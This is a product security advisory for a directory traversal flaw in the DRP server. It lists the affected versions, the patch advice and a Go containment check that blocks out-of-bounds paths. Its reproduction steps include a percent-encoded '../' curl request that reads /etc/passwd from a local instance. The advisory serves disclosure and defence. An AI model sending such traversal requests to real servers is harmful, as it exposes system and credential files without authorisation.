7.1. CVE 20200924a: Web requests can navigate outside of DRP controlled areas
The DRP server incorrectly honored .. path segments in web requests even when the resulting path was outside of the managed areas. This potentially allowed bad actors to access the host file system.
Classification: Directory Traversal
Reported: Sept 24, 2020
Fixed: Sept 24, 2020
Addressed In: v4.5, v4.4.7, v4.3.8, v4.2.17
7.1.1. Recommendation
Users are advised to apply this patch as soon as possible. Patching involves replacing the DR-SERVER binary with the one that closely matches the currently deployed version.
7.1.2. Mitigation
Code was added to prevent out of bounds navigation.
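A containment check of the kind this mitigation describes, as an added example. It is not DRP's actual patch, which this page does not show; the helper name resolveUnderRoot and the sample root /opt/drp/drp-data are assumptions, and the root is assumed to be an absolute, clean path.

```go
package main

import (
	"errors"
	"fmt"
	"net/url"
	"path/filepath"
	"strings"
)

// ErrOutsideRoot is returned when a request path resolves outside the managed root.
var ErrOutsideRoot = errors.New("path escapes managed root")

// resolveUnderRoot (hypothetical helper) maps a raw request path onto a file
// path and refuses anything that lands outside root after decoding.
// It does not follow symlinks; a real server would also need to account for those.
func resolveUnderRoot(root, rawPath string) (string, error) {
	// Decode percent-escapes first so %2e%2e is seen as "..".
	decoded, err := url.PathUnescape(rawPath)
	if err != nil {
		return "", err
	}
	// filepath.Join cleans the result, which resolves the dot segments.
	candidate := filepath.Join(root, filepath.FromSlash(decoded))
	// The path relative to root must not start by climbing out of it.
	rel, err := filepath.Rel(root, candidate)
	if err != nil {
		return "", err
	}
	if rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", ErrOutsideRoot
	}
	return candidate, nil
}

func main() {
	root := "/opt/drp/drp-data" // constructed sample root
	for _, p := range []string{
		"/files/boot.iso", // constructed in-bounds request
		"/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd", // path from the reproduction steps
		"/files/../../etc/passwd", // constructed unencoded variant
	} {
		got, err := resolveUnderRoot(root, p)
		fmt.Printf("%-58s -> %q, %v\n", p, got, err)
	}
}
```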
7.1.3. Steps to reproduce
docker run --rm -it ubuntu /bin/bash
apt update && apt install -y curl
cd /opt
mkdir drp ; cd drp
curl -fsSL get.rebar.digital/stable | bash -s -- --isolated install
./dr-provision --base-root=`pwd`/drp-data --local-content="" --default-content="" > drp.log 2>&1 &
curl -k https://127.0.0.1:8092/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
The above results in the contents of /etc/passwd being shown. This is particularly bad given that this application generally runs as root.